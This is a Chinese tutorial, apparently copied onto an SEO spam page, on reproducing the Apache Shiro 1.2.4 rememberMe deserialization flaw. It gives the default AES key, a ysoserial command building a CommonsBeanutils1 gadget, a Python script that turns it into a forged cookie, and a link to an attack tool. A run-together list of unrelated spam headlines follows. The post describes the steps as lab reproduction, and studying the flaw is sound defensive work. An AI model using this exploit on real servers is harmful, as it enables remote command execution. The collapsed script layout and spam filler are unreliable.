当前位置: 首页 > news >正文

网站设计制作推广优化关键词

网站设计制作,推广优化关键词,wordpress iis 404页面,即墨网站制作一、漏洞特征 Apache Shiro是一款开源强大且易用的Java安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 因为在反序列化时,不会对其进行过滤,所以如果传入恶意代码将会造成安全问题 在 1.2.4 版本前, 加…

一、漏洞特征
Apache Shiro是一款开源强大且易用的Java安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
因为在反序列化时,不会对其进行过滤,所以如果传入恶意代码将会造成安全问题
在 1.2.4 版本前, 加密的用户信息序列化后存储在名为remember-me的Cookie中,而且是默认ASE秘钥,Key: kPH+bIxk5D2deZiIxcaaaA==,可攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
而在1.2.4之后,ASE秘钥就不为默认了,需要获取到Key才可以进行渗透
总结一句话:ASE秘钥不能使用已知的外部秘钥,不能泄露秘钥。

影响版本Apache Shiro <= 1.2.4
漏洞特征:
shiro反序列化的特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段
进入后可以看到有remenber me的登录首页
在这里插入图片描述

二、漏洞复现
1.登录抓包拦截
同时勾选remenber me
在这里插入图片描述在这里插入图片描述

2.生成ser文件
使用ysoserial生成CommonsBeanutils1的Gadget
java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 “touch /tmp/succ123” > poc.ser
在这里插入图片描述

3.使用poc生成payload

import sys
import uuid
import base64
from Crypto.Cipher import AESdef encode_rememberme():f = open('poc.ser','rb')BS = AES.block_sizepad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")iv = uuid.uuid4().bytesencryptor = AES.new(key, AES.MODE_CBC, iv)file_body = pad(f.read())base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))return base64_ciphertextif __name__ == '__main__':payload = encode_rememberme()   
print("rememberMe={0}".format(payload.decode()))

在这里插入图片描述

4.将生成的payload替换到请求包cookie中
在这里插入图片描述

5.进入搭建靶机的机器,查看生成文件
在这里插入图片描述

三、工具利用
https://github.com/SummerSec/ShiroAttack2
在这里插入图片描述在这里插入图片描述

http://www.ds6.com.cn/news/76374.html

相关文章:

  • 网站建设论文的摘要小程序开发公司排行榜
  • 佛山建设网站公司西安seo关键词查询
  • 向客户介绍网站建设的话术游戏推广渠道有哪些
  • 山东做网站建设公司哪家好论坛外链代发
  • 网页制作外包长沙专业seo优化推荐
  • 网站网址前的小图标怎么做的谷歌google官网下载
  • 武汉市城乡建设局北京seo人员
  • 球形网架结构厂家影视站seo教程
  • 党政门户网站怎么做seo顾问咨询
  • 应用网站制作营销渠道有哪几种
  • 网站备案要幕布照提高网站收录的方法
  • 鲜花外贸网站建设百度一下官方网页
  • 网站制作 信科网络网络推广外包代理
  • 做色流网站在哪买学seo需要学什么专业
  • 游戏直播网站怎么做的网店推广是什么
  • 幼儿园网站建设实践研究系统优化app
  • 网站开发要什么基础在线制作网站免费
  • ps做网站的效果图焊工培训班
  • 大厂网站建设网络服务器的作用
  • 河南省做网站的公司seo教程seo优化
  • 香港做最好看的电影网站龙岩seo
  • 制作网站程序北京百度竞价托管
  • 百度怎么推广自己的视频广州网络seo优化
  • 做电影网站犯法百度的人工客服
  • 2019网站建设有限公司网站人多怎么优化
  • 网站开发搜索功能怎么实现什么软件可以排名次
  • 做宣传用什么网站好留号码的广告网站不需要验证码
  • 广州大型网站建设公司seo综合查询怎么用
  • 做电影网站需要网站服务器一年的费用
  • 前段 网站建设实例信息流推广渠道有哪些